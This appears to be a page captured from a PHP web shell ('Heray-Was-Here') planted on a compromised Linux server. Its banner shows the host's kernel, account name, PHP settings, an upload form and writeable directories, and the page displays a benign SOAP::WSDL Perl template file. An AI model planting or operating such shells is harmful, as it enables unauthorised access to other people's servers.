Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /usr/share/perl5/vendor_perl/SOAP/WSDL/Generator/Template/XSD/Interface/POD/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/perl5/vendor_perl/SOAP/WSDL/Generator/Template/XSD/Interface/POD/Operation.tt
[%# work around for CPAN's indexer, which gets disturbed by pod in templates -%]
[% head3 = BLOCK %]=head3[% END -%]
[% head3 %] [% operation.get_name %]

[%     type = definitions.find_portType( binding.expand( binding.get_type ) );
    port_op = type.find_operation( definitions.get_targetNamespace, operation.get_name );
    port_op.get_documentation();

    # for now we only document the first response part - document/literal
    # doesn't allow more.
    response_name = port_op.first_output.get_message();
    response_part = definitions.find_message( port_op.first_output.expand( response_name ) ).get_part();
    response_body_element = definitions.first_types.find_element( response_part.0.expand( response_part.0.get_element ) );
    response_body_class = XSD.create_xsd_name(response_body_element);
%]

Returns a L<[% response_body_class %]|[% response_body_class %]> object.

 $response = $interface->[% operation.get_name %]([% INCLUDE Interface/POD/Message.tt %] );

Hry